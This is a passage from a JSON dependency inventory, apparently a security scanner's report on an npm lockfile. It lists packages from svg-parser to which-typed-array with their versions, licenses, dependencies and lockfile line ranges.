"UID": "c1a603b53f5a52f0" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20380, "EndLine": 20391 } ], "AnalyzedBy": "npm" }, { "ID": "svg-parser@2.0.4", "Name": "svg-parser", "Identifier": { "PURL": "pkg:npm/svg-parser@2.0.4", "UID": "aa149eec2de4c49e" }, "Version": "2.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20392, "EndLine": 20397 } ], "AnalyzedBy": "npm" }, { "ID": "svgo@3.3.2", "Name": "svgo", "Identifier": { "PURL": "pkg:npm/svgo@3.3.2", "UID": "799b27abaf83d459" }, "Version": "3.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@trysound/sax@0.2.0", "commander@7.2.0", "css-select@5.2.2", "css-tree@2.3.1", "css-what@6.2.2", "csso@5.0.5", "picocolors@1.1.1" ], "Locations": [ { "StartLine": 20398, "EndLine": 20422 } ], "AnalyzedBy": "npm" }, { "ID": "tar@6.2.1", "Name": "tar", "Identifier": { "PURL": "pkg:npm/tar@6.2.1", "UID": "769cdab53da6940b" }, "Version": "6.2.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "chownr@2.0.0", "fs-minipass@2.1.0", "minipass@5.0.0", "minizlib@2.1.2", "mkdirp@1.0.4", "yallist@4.0.0" ], "Locations": [ { "StartLine": 20451, "EndLine": 20468 } ], "AnalyzedBy": "npm" }, { "ID": "tar@7.5.1", "Name": "tar", "Identifier": { "PURL": "pkg:npm/tar@7.5.1", "UID": "a31b88ca9e9fafdc" }, "Version": "7.5.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/fs-minipass@4.0.1", "chownr@3.0.0", "minipass@7.1.2", "minizlib@3.1.0", "yallist@5.0.0" ], "Locations": [ { "StartLine": 15682, "EndLine": 15696 } ], "AnalyzedBy": "npm" }, { "ID": "tar-fs@2.1.4", "Name": "tar-fs", "Identifier": { "PURL": "pkg:npm/tar-fs@2.1.4", "UID": "9ff520796b52f3f7" }, "Version": "2.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "chownr@1.1.4", "mkdirp-classic@0.5.3", "pump@3.0.3", "tar-stream@2.2.0" ], "Locations": [ { "StartLine": 16814, "EndLine": 16825 } ], "AnalyzedBy": "npm" }, { "ID": "tar-fs@3.1.1", "Name": "tar-fs", "Identifier": { "PURL": "pkg:npm/tar-fs@3.1.1", "UID": "30ffbff3d12a447" }, "Version": "3.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bare-fs@4.4.5", "bare-path@3.0.0", "pump@3.0.3", "tar-stream@3.1.7" ], "Locations": [ { "StartLine": 20469, "EndLine": 20482 } ], "AnalyzedBy": "npm" }, { "ID": "tar-stream@2.2.0", "Name": "tar-stream", "Identifier": { "PURL": "pkg:npm/tar-stream@2.2.0", "UID": "ad808f15f3e6c001" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bl@4.1.0", "end-of-stream@1.4.5", "fs-constants@1.0.0", "inherits@2.0.4", "readable-stream@3.6.2" ], "Locations": [ { "StartLine": 16826, "EndLine": 16841 } ], "AnalyzedBy": "npm" }, { "ID": "tar-stream@3.1.7", "Name": "tar-stream", "Identifier": { "PURL": "pkg:npm/tar-stream@3.1.7", "UID": "90c94c13f910f8bd" }, "Version": "3.1.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "b4a@1.7.3", "fast-fifo@1.3.2", "streamx@2.23.0" ], "Locations": [ { "StartLine": 20483, "EndLine": 20493 } ], "AnalyzedBy": "npm" }, { "ID": "terser@5.44.0", "Name": "terser", "Identifier": { "PURL": "pkg:npm/terser@5.44.0", "UID": "b53845c2d4e0432e" }, "Version": "5.44.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/source-map@0.3.11", "acorn@8.15.0", "commander@2.20.3", "source-map-support@0.5.21" ], "Locations": [ { "StartLine": 20521, "EndLine": 20538 } ], "AnalyzedBy": "npm" }, { "ID": "test-exclude@6.0.0", "Name": "test-exclude", "Identifier": { "PURL": "pkg:npm/test-exclude@6.0.0", "UID": "57e95fc18e4119c0" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@istanbuljs/schema@0.1.3", "glob@7.2.3", "minimatch@3.1.2" ], "Locations": [ { "StartLine": 20555, "EndLine": 20568 } ], "AnalyzedBy": "npm" }, { "ID": "text-decoder@1.2.3", "Name": "text-decoder", "Identifier": { "PURL": "pkg:npm/text-decoder@1.2.3", "UID": "14ea812861efe47a" }, "Version": "1.2.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "b4a@1.7.3" ], "Locations": [ { "StartLine": 20591, "EndLine": 20599 } ], "AnalyzedBy": "npm" }, { "ID": "text-segmentation@1.0.3", "Name": "text-segmentation", "Identifier": { "PURL": "pkg:npm/text-segmentation@1.0.3", "UID": "e106e448662fe86f" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "utrie@1.0.2" ], "Locations": [ { "StartLine": 20600, "EndLine": 20608 } ], "AnalyzedBy": "npm" }, { "ID": "text-table@0.2.0", "Name": "text-table", "Identifier": { "PURL": "pkg:npm/text-table@0.2.0", "UID": "30cc95832c68924a" }, "Version": "0.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15705, "EndLine": 15711 }, { "StartLine": 20609, "EndLine": 20615 } ], "AnalyzedBy": "npm" }, { "ID": "throat@5.0.0", "Name": "throat", "Identifier": { "PURL": "pkg:npm/throat@5.0.0", "UID": "b74ab66e2eac7efa" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20616, "EndLine": 20621 } ], "AnalyzedBy": "npm" }, { "ID": "tiny-queue@0.2.1", "Name": "tiny-queue", "Identifier": { "PURL": "pkg:npm/tiny-queue@0.2.1", "UID": "5a504f208e066ee7" }, "Version": "0.2.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20622, "EndLine": 20627 } ], "AnalyzedBy": "npm" }, { "ID": "tiny-relative-date@2.0.2", "Name": "tiny-relative-date", "Identifier": { "PURL": "pkg:npm/tiny-relative-date@2.0.2", "UID": "29661be603848659" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15712, "EndLine": 15718 } ], "AnalyzedBy": "npm" }, { "ID": "tinyglobby@0.2.15", "Name": "tinyglobby", "Identifier": { "PURL": "pkg:npm/tinyglobby@0.2.15", "UID": "3d7d427136e8dc05" }, "Version": "0.2.15", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fdir@6.5.0", "picomatch@4.0.3" ], "Locations": [ { "StartLine": 15719, "EndLine": 15735 } ], "AnalyzedBy": "npm" }, { "ID": "tmpl@1.0.5", "Name": "tmpl", "Identifier": { "PURL": "pkg:npm/tmpl@1.0.5", "UID": "9c14aa28b5485d7" }, "Version": "1.0.5", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20638, "EndLine": 20643 } ], "AnalyzedBy": "npm" }, { "ID": "to-regex-range@5.0.1", "Name": "to-regex-range", "Identifier": { "PURL": "pkg:npm/to-regex-range@5.0.1", "UID": "559a8ff4296cf1a7" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-number@7.0.0" ], "Locations": [ { "StartLine": 20644, "EndLine": 20655 } ], "AnalyzedBy": "npm" }, { "ID": "toidentifier@1.0.1", "Name": "toidentifier", "Identifier": { "PURL": "pkg:npm/toidentifier@1.0.1", "UID": "e73b4344b140bafa" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20656, "EndLine": 20664 } ], "AnalyzedBy": "npm" }, { "ID": "treeverse@3.0.0", "Name": "treeverse", "Identifier": { "PURL": "pkg:npm/treeverse@3.0.0", "UID": "daf33512326529e9" }, "Version": "3.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15765, "EndLine": 15774 } ], "AnalyzedBy": "npm" }, { "ID": "trim-newlines@3.0.1", "Name": "trim-newlines", "Identifier": { "PURL": "pkg:npm/trim-newlines@3.0.1", "UID": "af81b6a28c57499e" }, "Version": "3.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20665, "EndLine": 20673 } ], "AnalyzedBy": "npm" }, { "ID": "ts-dedent@2.2.0", "Name": "ts-dedent", "Identifier": { "PURL": "pkg:npm/ts-dedent@2.2.0", "UID": "43870a170a46e3b5" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20687, "EndLine": 20695 } ], "AnalyzedBy": "npm" }, { "ID": "tslib@2.8.1", "Name": "tslib", "Identifier": { "PURL": "pkg:npm/tslib@2.8.1", "UID": "7f73c280e0bbd63c" }, "Version": "2.8.1", "Licenses": [ "0BSD" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2432, "EndLine": 2437 }, { "StartLine": 2470, "EndLine": 2475 }, { "StartLine": 2482, "EndLine": 2487 }, { "StartLine": 2542, "EndLine": 2547 }, { "StartLine": 2560, "EndLine": 2565 }, { "StartLine": 2582, "EndLine": 2587 }, { "StartLine": 2594, "EndLine": 2599 }, { "StartLine": 2643, "EndLine": 2648 }, { "StartLine": 2665, "EndLine": 2670 }, { "StartLine": 2684, "EndLine": 2689 }, { "StartLine": 2706, "EndLine": 2711 }, { "StartLine": 2747, "EndLine": 2752 }, { "StartLine": 2763, "EndLine": 2768 }, { "StartLine": 2809, "EndLine": 2814 }, { "StartLine": 2825, "EndLine": 2830 }, { "StartLine": 2870, "EndLine": 2875 }, { "StartLine": 2882, "EndLine": 2887 }, { "StartLine": 2919, "EndLine": 2924 }, { "StartLine": 2934, "EndLine": 2939 }, { "StartLine": 2952, "EndLine": 2957 }, { "StartLine": 2990, "EndLine": 2995 }, { "StartLine": 3002, "EndLine": 3007 }, { "StartLine": 3042, "EndLine": 3047 }, { "StartLine": 3054, "EndLine": 3059 }, { "StartLine": 3093, "EndLine": 3098 }, { "StartLine": 3105, "EndLine": 3110 }, { "StartLine": 3147, "EndLine": 3152 }, { "StartLine": 3163, "EndLine": 3168 }, { "StartLine": 3182, "EndLine": 3187 }, { "StartLine": 8033, "EndLine": 8038 }, { "StartLine": 12089, "EndLine": 12094 }, { "StartLine": 13166, "EndLine": 13171 }, { "StartLine": 19777, "EndLine": 19782 } ], "AnalyzedBy": "npm" }, { "ID": "tuf-js@4.0.0", "Name": "tuf-js", "Identifier": { "PURL": "pkg:npm/tuf-js@4.0.0", "UID": "4cfdb0fb63a183ba" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@tufjs/models@4.0.0", "debug@4.4.3", "make-fetch-happen@15.0.2" ], "Locations": [ { "StartLine": 15775, "EndLine": 15787 } ], "AnalyzedBy": "npm" }, { "ID": "tunnel-agent@0.6.0", "Name": "tunnel-agent", "Identifier": { "PURL": "pkg:npm/tunnel-agent@0.6.0", "UID": "a373d88c1d5de1f1" }, "Version": "0.6.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 20719, "EndLine": 20730 } ], "AnalyzedBy": "npm" }, { "ID": "type-detect@4.0.8", "Name": "type-detect", "Identifier": { "PURL": "pkg:npm/type-detect@4.0.8", "UID": "8fcecd5e8f0d5f3a" }, "Version": "4.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20744, "EndLine": 20752 } ], "AnalyzedBy": "npm" }, { "ID": "type-fest@0.18.1", "Name": "type-fest", "Identifier": { "PURL": "pkg:npm/type-fest@0.18.1", "UID": "d7deda24ee27105b" }, "Version": "0.18.1", "Licenses": [ "(MIT OR CC0-1.0)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 12342, "EndLine": 12353 } ], "AnalyzedBy": "npm" }, { "ID": "type-fest@0.6.0", "Name": "type-fest", "Identifier": { "PURL": "pkg:npm/type-fest@0.6.0", "UID": "59ebc5635ae71160" }, "Version": "0.6.0", "Licenses": [ "(MIT OR CC0-1.0)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 18889, "EndLine": 18897 } ], "AnalyzedBy": "npm" }, { "ID": "type-fest@0.7.1", "Name": "type-fest", "Identifier": { "PURL": "pkg:npm/type-fest@0.7.1", "UID": "332be6e3af6741a" }, "Version": "0.7.1", "Licenses": [ "(MIT OR CC0-1.0)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20045, "EndLine": 20053 } ], "AnalyzedBy": "npm" }, { "ID": "type-fest@0.8.1", "Name": "type-fest", "Identifier": { "PURL": "pkg:npm/type-fest@0.8.1", "UID": "9bdb2c9c3c264141" }, "Version": "0.8.1", "Licenses": [ "(MIT OR CC0-1.0)" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 18853, "EndLine": 18861 } ], "AnalyzedBy": "npm" }, { "ID": "type-is@1.6.18", "Name": "type-is", "Identifier": { "PURL": "pkg:npm/type-is@1.6.18", "UID": "161fac58e3f05330" }, "Version": "1.6.18", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "media-typer@0.3.0", "mime-types@2.1.35" ], "Locations": [ { "StartLine": 20766, "EndLine": 20779 } ], "AnalyzedBy": "npm" }, { "ID": "ua-parser-js@0.7.41", "Name": "ua-parser-js", "Identifier": { "PURL": "pkg:npm/ua-parser-js@0.7.41", "UID": "4bc86d584950d7f5" }, "Version": "0.7.41", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20872, "EndLine": 20897 } ], "AnalyzedBy": "npm" }, { "ID": "uc.micro@1.0.6", "Name": "uc.micro", "Identifier": { "PURL": "pkg:npm/uc.micro@1.0.6", "UID": "da3a213db8b0fd87" }, "Version": "1.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20898, "EndLine": 20903 } ], "AnalyzedBy": "npm" }, { "ID": "undici-types@7.14.0", "Name": "undici-types", "Identifier": { "PURL": "pkg:npm/undici-types@7.14.0", "UID": "f4875e8dfc7dd5b6" }, "Version": "7.14.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20923, "EndLine": 20928 } ], "AnalyzedBy": "npm" }, { "ID": "unicode-canonical-property-names-ecmascript@2.0.1", "Name": "unicode-canonical-property-names-ecmascript", "Identifier": { "PURL": "pkg:npm/unicode-canonical-property-names-ecmascript@2.0.1", "UID": "b1f487b64ff5f8db" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20929, "EndLine": 20937 } ], "AnalyzedBy": "npm" }, { "ID": "unicode-match-property-ecmascript@2.0.0", "Name": "unicode-match-property-ecmascript", "Identifier": { "PURL": "pkg:npm/unicode-match-property-ecmascript@2.0.0", "UID": "152e768f6a7f6108" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "unicode-canonical-property-names-ecmascript@2.0.1", "unicode-property-aliases-ecmascript@2.2.0" ], "Locations": [ { "StartLine": 20938, "EndLine": 20950 } ], "AnalyzedBy": "npm" }, { "ID": "unicode-match-property-value-ecmascript@2.2.1", "Name": "unicode-match-property-value-ecmascript", "Identifier": { "PURL": "pkg:npm/unicode-match-property-value-ecmascript@2.2.1", "UID": "3a286b89e38a81e" }, "Version": "2.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20951, "EndLine": 20959 } ], "AnalyzedBy": "npm" }, { "ID": "unicode-property-aliases-ecmascript@2.2.0", "Name": "unicode-property-aliases-ecmascript", "Identifier": { "PURL": "pkg:npm/unicode-property-aliases-ecmascript@2.2.0", "UID": "6075d1c39bfce75e" }, "Version": "2.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20960, "EndLine": 20968 } ], "AnalyzedBy": "npm" }, { "ID": "unique-filename@1.1.1", "Name": "unique-filename", "Identifier": { "PURL": "pkg:npm/unique-filename@1.1.1", "UID": "16a95b41c48a6705" }, "Version": "1.1.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "unique-slug@2.0.2" ], "Locations": [ { "StartLine": 20969, "EndLine": 20978 } ], "AnalyzedBy": "npm" }, { "ID": "unique-filename@4.0.0", "Name": "unique-filename", "Identifier": { "PURL": "pkg:npm/unique-filename@4.0.0", "UID": "54f5356afe621255" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "unique-slug@5.0.0" ], "Locations": [ { "StartLine": 15788, "EndLine": 15798 } ], "AnalyzedBy": "npm" }, { "ID": "unique-slug@2.0.2", "Name": "unique-slug", "Identifier": { "PURL": "pkg:npm/unique-slug@2.0.2", "UID": "8b03a55bac460134" }, "Version": "2.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "imurmurhash@0.1.4" ], "Locations": [ { "StartLine": 20979, "EndLine": 20988 } ], "AnalyzedBy": "npm" }, { "ID": "unique-slug@5.0.0", "Name": "unique-slug", "Identifier": { "PURL": "pkg:npm/unique-slug@5.0.0", "UID": "e5649e60f6c5e31f" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "imurmurhash@0.1.4" ], "Locations": [ { "StartLine": 15799, "EndLine": 15809 } ], "AnalyzedBy": "npm" }, { "ID": "universalify@0.1.2", "Name": "universalify", "Identifier": { "PURL": "pkg:npm/universalify@0.1.2", "UID": "14a263b02db95d23" }, "Version": "0.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20989, "EndLine": 20997 } ], "AnalyzedBy": "npm" }, { "ID": "universalify@2.0.1", "Name": "universalify", "Identifier": { "PURL": "pkg:npm/universalify@2.0.1", "UID": "933eff322a45e2af" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 16481, "EndLine": 16490 }, { "StartLine": 17671, "EndLine": 17679 } ], "AnalyzedBy": "npm" }, { "ID": "unpipe@1.0.0", "Name": "unpipe", "Identifier": { "PURL": "pkg:npm/unpipe@1.0.0", "UID": "5b6cbebd20aafc8a" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 20998, "EndLine": 21006 } ], "AnalyzedBy": "npm" }, { "ID": "update-browserslist-db@1.1.3", "Name": "update-browserslist-db", "Identifier": { "PURL": "pkg:npm/update-browserslist-db@1.1.3", "UID": "d2604c9f7e10ad89" }, "Version": "1.1.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "browserslist@4.26.3", "escalade@3.2.0", "picocolors@1.1.1" ], "Locations": [ { "StartLine": 21007, "EndLine": 21036 } ], "AnalyzedBy": "npm" }, { "ID": "use-latest-callback@0.2.5", "Name": "use-latest-callback", "Identifier": { "PURL": "pkg:npm/use-latest-callback@0.2.5", "UID": "15cbdbe806497b6a" }, "Version": "0.2.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "react@19.1.0" ], "Locations": [ { "StartLine": 21047, "EndLine": 21055 } ], "AnalyzedBy": "npm" }, { "ID": "use-sync-external-store@1.6.0", "Name": "use-sync-external-store", "Identifier": { "PURL": "pkg:npm/use-sync-external-store@1.6.0", "UID": "464cb74fb1c1d423" }, "Version": "1.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "react@19.1.0" ], "Locations": [ { "StartLine": 21056, "EndLine": 21064 } ], "AnalyzedBy": "npm" }, { "ID": "utf8@3.0.0", "Name": "utf8", "Identifier": { "PURL": "pkg:npm/utf8@3.0.0", "UID": "549b0a1a32fedbe1" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21065, "EndLine": 21070 } ], "AnalyzedBy": "npm" }, { "ID": "util@0.12.5", "Name": "util", "Identifier": { "PURL": "pkg:npm/util@0.12.5", "UID": "413359099aad5ad0" }, "Version": "0.12.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4", "is-arguments@1.2.0", "is-generator-function@1.1.2", "is-typed-array@1.1.15", "which-typed-array@1.1.19" ], "Locations": [ { "StartLine": 21071, "EndLine": 21083 } ], "AnalyzedBy": "npm" }, { "ID": "util-deprecate@1.0.2", "Name": "util-deprecate", "Identifier": { "PURL": "pkg:npm/util-deprecate@1.0.2", "UID": "d2c6b8a9b80bcc03" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15810, "EndLine": 15816 }, { "StartLine": 21084, "EndLine": 21089 } ], "AnalyzedBy": "npm" }, { "ID": "utils-merge@1.0.1", "Name": "utils-merge", "Identifier": { "PURL": "pkg:npm/utils-merge@1.0.1", "UID": "8bf8bc69ead146a2" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21090, "EndLine": 21098 } ], "AnalyzedBy": "npm" }, { "ID": "utrie@1.0.2", "Name": "utrie", "Identifier": { "PURL": "pkg:npm/utrie@1.0.2", "UID": "c02b7dc15a51d0f7" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-arraybuffer@1.0.2" ], "Locations": [ { "StartLine": 21099, "EndLine": 21107 } ], "AnalyzedBy": "npm" }, { "ID": "uuid@3.4.0", "Name": "uuid", "Identifier": { "PURL": "pkg:npm/uuid@3.4.0", "UID": "7d9619cf1e452e6a" }, "Version": "3.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 17449, "EndLine": 17458 } ], "AnalyzedBy": "npm" }, { "ID": "uuid@7.0.3", "Name": "uuid", "Identifier": { "PURL": "pkg:npm/uuid@7.0.3", "UID": "4c942b206312fdd9" }, "Version": "7.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21108, "EndLine": 21116 } ], "AnalyzedBy": "npm" }, { "ID": "validate-npm-package-license@3.0.4", "Name": "validate-npm-package-license", "Identifier": { "PURL": "pkg:npm/validate-npm-package-license@3.0.4", "UID": "aea52984c8673080" }, "Version": "3.0.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "spdx-correct@3.2.0", "spdx-expression-parse@3.0.1" ], "Locations": [ { "StartLine": 15817, "EndLine": 15825 }, { "StartLine": 21132, "EndLine": 21141 } ], "AnalyzedBy": "npm" }, { "ID": "validate-npm-package-name@6.0.2", "Name": "validate-npm-package-name", "Identifier": { "PURL": "pkg:npm/validate-npm-package-name@6.0.2", "UID": "4345e13f614611d9" }, "Version": "6.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15835, "EndLine": 15842 } ], "AnalyzedBy": "npm" }, { "ID": "vary@1.1.2", "Name": "vary", "Identifier": { "PURL": "pkg:npm/vary@1.1.2", "UID": "8173cd8d197f67aa" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21142, "EndLine": 21151 } ], "AnalyzedBy": "npm" }, { "ID": "vlq@1.0.1", "Name": "vlq", "Identifier": { "PURL": "pkg:npm/vlq@1.0.1", "UID": "81d9e50d75fd56e2" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21152, "EndLine": 21157 } ], "AnalyzedBy": "npm" }, { "ID": "walk-up-path@4.0.0", "Name": "walk-up-path", "Identifier": { "PURL": "pkg:npm/walk-up-path@4.0.0", "UID": "90b801f2be31abad" }, "Version": "4.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 15843, "EndLine": 15852 } ], "AnalyzedBy": "npm" }, { "ID": "walker@1.0.8", "Name": "walker", "Identifier": { "PURL": "pkg:npm/walker@1.0.8", "UID": "58d3121c35347fff" }, "Version": "1.0.8", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "makeerror@1.0.12" ], "Locations": [ { "StartLine": 21158, "EndLine": 21166 } ], "AnalyzedBy": "npm" }, { "ID": "warn-once@0.1.1", "Name": "warn-once", "Identifier": { "PURL": "pkg:npm/warn-once@0.1.1", "UID": "c8e8a034b56952dd" }, "Version": "0.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21167, "EndLine": 21172 } ], "AnalyzedBy": "npm" }, { "ID": "wcwidth@1.0.1", "Name": "wcwidth", "Identifier": { "PURL": "pkg:npm/wcwidth@1.0.1", "UID": "f0f4cbaf2f0276b7" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "defaults@1.0.4" ], "Locations": [ { "StartLine": 21173, "EndLine": 21181 } ], "AnalyzedBy": "npm" }, { "ID": "web-vitals@4.2.4", "Name": "web-vitals", "Identifier": { "PURL": "pkg:npm/web-vitals@4.2.4", "UID": "4dfca1a421b1559" }, "Version": "4.2.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21182, "EndLine": 21187 } ], "AnalyzedBy": "npm" }, { "ID": "websocket-driver@0.7.4", "Name": "websocket-driver", "Identifier": { "PURL": "pkg:npm/websocket-driver@0.7.4", "UID": "c6ea745149938033" }, "Version": "0.7.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "http-parser-js@0.5.10", "safe-buffer@5.2.1", "websocket-extensions@0.1.4" ], "Locations": [ { "StartLine": 21188, "EndLine": 21201 } ], "AnalyzedBy": "npm" }, { "ID": "websocket-extensions@0.1.4", "Name": "websocket-extensions", "Identifier": { "PURL": "pkg:npm/websocket-extensions@0.1.4", "UID": "4edf84ea0e7d3726" }, "Version": "0.1.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21202, "EndLine": 21210 } ], "AnalyzedBy": "npm" }, { "ID": "websql@2.0.3", "Name": "websql", "Identifier": { "PURL": "pkg:npm/websql@2.0.3", "UID": "7c9c9e3797de7dfb" }, "Version": "2.0.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "argsarray@0.0.1", "immediate@3.3.0", "noop-fn@1.0.0", "sqlite3@5.1.7", "tiny-queue@0.2.1" ], "Locations": [ { "StartLine": 21211, "EndLine": 21225 } ], "AnalyzedBy": "npm" }, { "ID": "whatwg-fetch@3.6.20", "Name": "whatwg-fetch", "Identifier": { "PURL": "pkg:npm/whatwg-fetch@3.6.20", "UID": "19d0578d8c0662b0" }, "Version": "3.6.20", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21226, "EndLine": 21231 } ], "AnalyzedBy": "npm" }, { "ID": "which@2.0.2", "Name": "which", "Identifier": { "PURL": "pkg:npm/which@2.0.2", "UID": "3cb8c793a23ddd82" }, "Version": "2.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "isexe@2.0.0" ], "Locations": [ { "StartLine": 14226, "EndLine": 14239 }, { "StartLine": 21232, "EndLine": 21246 } ], "AnalyzedBy": "npm" }, { "ID": "which@5.0.0", "Name": "which", "Identifier": { "PURL": "pkg:npm/which@5.0.0", "UID": "1112166a6fb4ed50" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "isexe@3.1.1" ], "Locations": [ { "StartLine": 15853, "EndLine": 15866 } ], "AnalyzedBy": "npm" }, { "ID": "which-module@2.0.1", "Name": "which-module", "Identifier": { "PURL": "pkg:npm/which-module@2.0.1", "UID": "187490fc6701f9e9" }, "Version": "2.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 21314, "EndLine": 21320 } ], "AnalyzedBy": "npm" }, { "ID": "which-typed-array@1.1.19", "Name": "which-typed-array", "Identifier": { "PURL": "pkg:npm/which-typed-array@1.1.19", "UID": "683c065633cd1dad" }, "Version": "1.1.19", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", 